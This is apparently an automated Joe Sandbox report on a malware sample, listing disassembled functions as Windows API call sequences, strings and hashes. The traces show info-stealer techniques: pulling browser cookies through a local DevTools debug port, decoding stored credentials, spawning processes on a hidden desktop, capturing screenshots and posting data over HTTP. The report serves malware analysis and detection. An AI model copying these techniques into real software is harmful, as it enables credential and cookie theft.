                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 2775534915-0
                                      • Opcode ID: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                      • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                      • Opcode Fuzzy Hash: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                      • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048CD2EA
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 048CD42E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048CD435
                                      • lstrcat.KERNEL32(?,00000000), ref: 048CD56F
                                      • lstrcat.KERNEL32(?,00421570), ref: 048CD57E
                                      • lstrcat.KERNEL32(?,00000000), ref: 048CD591
                                      • lstrcat.KERNEL32(?,00421574), ref: 048CD5A0
                                      • lstrcat.KERNEL32(?,00000000), ref: 048CD5B3
                                      • lstrcat.KERNEL32(?,00421578), ref: 048CD5C2
                                      • lstrcat.KERNEL32(?,00000000), ref: 048CD5D5
                                      • lstrcat.KERNEL32(?,0042157C), ref: 048CD5E4
                                      • lstrcat.KERNEL32(?,00000000), ref: 048CD5F7
                                      • lstrcat.KERNEL32(?,00421580), ref: 048CD606
                                      • lstrcat.KERNEL32(?,00000000), ref: 048CD619
                                      • lstrcat.KERNEL32(?,00421584), ref: 048CD628
                                      • lstrcat.KERNEL32(?,00000000), ref: 048CD63B
                                      • lstrcat.KERNEL32(?,00421588), ref: 048CD64A
                                        • Part of subcall function 048DAD97: lstrlen.KERNEL32(048C51BC,?,?,048C51BC,00420DDF), ref: 048DADA2
                                        • Part of subcall function 048DAD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 048DADFC
                                      • lstrlen.KERNEL32(?), ref: 048CD691
                                      • lstrlen.KERNEL32(?), ref: 048CD6A0
                                      • memset.MSVCRT ref: 048CD6EF
                                        • Part of subcall function 048DAFE7: StrCmpCA.SHLWAPI(00000000,00421568,048CD509,00421568,00000000), ref: 048DB006
                                      • DeleteFileA.KERNEL32(00000000), ref: 048CD71B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 1973479514-0
                                      • Opcode ID: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                      • Instruction ID: 9ee9728ef34ebd58c339b9d49f10a5b8c876463a3de952531262250b6c1caf33
                                      • Opcode Fuzzy Hash: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                      • Instruction Fuzzy Hash: 49E14E71D01118ABDB08EBA4DD54DEE7339AF54305F204A69F507E60A0EFB5BE48CB62
                                      APIs
                                        • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                      • memset.MSVCRT ref: 00409C33
                                      • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                      • memset.MSVCRT ref: 00409C9A
                                      • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                      • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                      • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                      • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                      • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                      • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                      • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                      • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • memset.MSVCRT ref: 00409D7E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 689835475-3542011879
                                      • Opcode ID: 0f4eae4b186cbd02d04a961c8613f19afe80490064d29fcc716c48ba3c8a2736
                                      • Instruction ID: 9597081ec4872356d8a1e20e182716cfae729ad967be985c4dfb38bd464ab4a8
                                      • Opcode Fuzzy Hash: 0f4eae4b186cbd02d04a961c8613f19afe80490064d29fcc716c48ba3c8a2736
                                      • Instruction Fuzzy Hash: 74516D71D10518ABCB14EBA0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                      APIs
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
                                        • Part of subcall function 048C4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
                                        • Part of subcall function 048C4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 048C5CAF
                                      • StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C5CCA
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048C5E4A
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421B50,00000000,?,006D6AF0,00000000,?,006D6CF0,00000000,?,00421B4C), ref: 048C6128
                                      • lstrlen.KERNEL32(00000000), ref: 048C6139
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 048C614A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048C6151
                                      • lstrlen.KERNEL32(00000000), ref: 048C6166
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 048C617D
                                      • lstrlen.KERNEL32(00000000), ref: 048C618F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 048C61A8
                                      • memcpy.MSVCRT(?), ref: 048C61B5
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 048C61D2
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 048C61E6
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 048C6203
                                      • InternetCloseHandle.WININET(00000000), ref: 048C6267
                                      • InternetCloseHandle.WININET(00000000), ref: 048C6274
                                      • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 048C5EAF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                      • InternetCloseHandle.WININET(00000000), ref: 048C627E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                      • String ID:
                                      • API String ID: 1703137719-0
                                      • Opcode ID: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                      • Instruction ID: 83685a4dd78fcfbb7099282a6059158d70d5bdab14e190e2bda898d64d650807
                                      • Opcode Fuzzy Hash: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                      • Instruction Fuzzy Hash: 9712ED71D51128AADB19EBA4DC94FEEB378BF14705F504AA9A107E2090EFB07A48CF51
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02EB5330,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                      • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                      • StrStrA.SHLWAPI(?,02EB54E0,00420B56), ref: 0040CBF7
                                      • StrStrA.SHLWAPI(00000000,02EB53A8), ref: 0040CC1E
                                      • StrStrA.SHLWAPI(?,02EB5DF0,00000000,?,00421550,00000000,?,00000000,00000000,?,02EB2210,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                      • StrStrA.SHLWAPI(00000000,02EB5C30), ref: 0040CDB9
                                        • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                        • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02EB20E0), ref: 0040C971
                                        • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                        • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                      • StrStrA.SHLWAPI(?,02EB5C30,00000000,?,00421554,00000000,?,00000000,02EB20E0), ref: 0040CE5A
                                      • StrStrA.SHLWAPI(00000000,02EB2420), ref: 0040CE71
                                        • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                        • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                        • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                      • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 1564132460-3916222277
                                      • Opcode ID: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                      • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                      • Opcode Fuzzy Hash: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                      • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006D703C,00000000,?,00421544,00000000,?,?), ref: 048CCDD3
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 048CCDF0
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 048CCDFC
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 048CCE0F
                                      • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 048CCE1C
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 048CCE40
                                      • StrStrA.SHLWAPI(?,006D6BB0,00420B56), ref: 048CCE5E
                                      • StrStrA.SHLWAPI(00000000,006D6D64), ref: 048CCE85
                                      • StrStrA.SHLWAPI(?,006D6ED0,00000000,?,00421550,00000000,?,00000000,00000000,?,006D6B5C,00000000,?,0042154C,00000000,?), ref: 048CD009
                                      • StrStrA.SHLWAPI(00000000,006D6ECC), ref: 048CD020
                                        • Part of subcall function 048CCB87: memset.MSVCRT ref: 048CCBBA
                                        • Part of subcall function 048CCB87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 048CCBD8
                                        • Part of subcall function 048CCB87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 048CCBE3
                                        • Part of subcall function 048CCB87: memcpy.MSVCRT(?,?,?), ref: 048CCC79
                                      • StrStrA.SHLWAPI(?,006D6ECC,00000000,?,00421554,00000000,?,00000000,006D6ADC), ref: 048CD0C1
                                      • StrStrA.SHLWAPI(00000000,006D6FA8), ref: 048CD0D8
                                        • Part of subcall function 048CCB87: lstrcat.KERNEL32(?,00420B47), ref: 048CCCAA
                                        • Part of subcall function 048CCB87: lstrcat.KERNEL32(?,00420B4B), ref: 048CCCBE
                                        • Part of subcall function 048CCB87: lstrcat.KERNEL32(?,00420B4E), ref: 048CCCDF
                                      • lstrlen.KERNEL32(00000000), ref: 048CD1AB
                                      • CloseHandle.KERNEL32(00000000), ref: 048CD203
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 1564132460-3916222277
                                      • Opcode ID: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                      • Instruction ID: 049f3df92b5b6044e418b9bfbcea62f46f199acd9af5276afe039ef1ddac632c
                                      • Opcode Fuzzy Hash: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                      • Instruction Fuzzy Hash: A7E1FB71D01118ABDB18EBA8DC90EEEB779AF58304F504A59F147E2190EFB07A49CF61
                                      APIs
                                      • memset.MSVCRT ref: 048CA0AE
                                        • Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D
                                      • wsprintfA.USER32 ref: 048CA0E6
                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 048CA10A
                                      • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 048CA133
                                      • memset.MSVCRT ref: 048CA154
                                      • lstrcat.KERNEL32(00000000,?), ref: 048CA16A
                                      • lstrcat.KERNEL32(00000000,?), ref: 048CA17E
                                      • lstrcat.KERNEL32(00000000,004212D8), ref: 048CA190
                                      • memset.MSVCRT ref: 048CA1A4
                                      • lstrcpy.KERNEL32(?,00000000), ref: 048CA1E3
                                      • memset.MSVCRT ref: 048CA203
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 048CA26B
                                      • Sleep.KERNEL32(00001388), ref: 048CA27A
                                      • CloseDesktop.USER32(00000000), ref: 048CA2C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 1347862506-2746444292
                                      • Opcode ID: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                      • Instruction ID: 6c354bae4d093feea8d70f11ca7176926f957faca3ded8d8b88b4c420048ea17
                                      • Opcode Fuzzy Hash: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                      • Instruction Fuzzy Hash: BA5193B1D04318ABEB24DB64DC49FD97778AF48704F004698F60DAA2D0EBB5AB84CF55
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: `dAF$`dAF$image/jpeg
                                      • API String ID: 2244384528-2462684518
                                      • Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                      • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                      • Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                      • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID: block
                                      • API String ID: 3407564107-2199623458
                                      • Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                      • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                      • Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                      • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A
                                      APIs
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                        • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02EB7320), ref: 00406353
                                        • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                        • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02EB6960,00000000,00000000,00400100,00000000), ref: 004063D5
                                        • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                        • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                      • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                        • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                      • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                      • strtok.MSVCRT(00000000,?), ref: 004155EE
                                      • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                      • API String ID: 3532888709-2643084821
                                      • Opcode ID: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                      • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                      • Opcode Fuzzy Hash: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                      • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                      APIs
                                      • strtok_s.MSVCRT ref: 00411557
                                      • strtok_s.MSVCRT ref: 004119A0
                                        • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
                                        • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
